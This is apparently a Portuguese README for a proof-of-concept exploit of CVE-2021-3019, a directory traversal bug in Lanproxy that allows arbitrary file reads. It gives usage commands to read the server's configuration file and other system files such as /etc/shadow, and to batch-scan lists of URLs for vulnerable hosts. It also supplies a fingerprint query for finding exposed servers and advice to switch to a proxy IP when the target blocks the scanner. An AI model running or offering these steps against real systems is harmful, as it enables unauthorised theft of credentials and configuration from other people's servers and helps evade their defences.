
CVE-2021-3019 lanproxy POC de detecção de vulnerabilidade de travessia de diretório e leitura arbitrária de arquivos
CVE-2021-3019 Lanproxy - Vulnerabilidade de traversal de diretório para leitura arbitrária de arquivos

git clone https://github.com/FanqXu/CVE-2021-3019.git
cd CVE-2021-3019
Executar sem argumentos exibe a mensagem de ajuda

Detecta a vulnerabilidade em uma única URL. Se a vulnerabilidade existir, lê o arquivo de configuração por padrão e o exibe.
python3 POC.py -u http://127.0.0.1:9100

Use o parâmetro -r para ler outros arquivos do sistema. É necessário saber o caminho absoluto do arquivo.
python3 POC.py -u http://127.0.0.1:9100 -r /etc/shadow

Use o parâmetro -f para verificação em lote. URLs vulneráveis serão escritas no arquivo success.txt.
python3 POC.py -f urls.txt

"Server: LPS-0.1" && title=="Login"
Quando aparecer Connection reset by peer, é muito provável que o IP tenha sido bloqueado pelo servidor alvo. Basta trocar por um IP de proxy.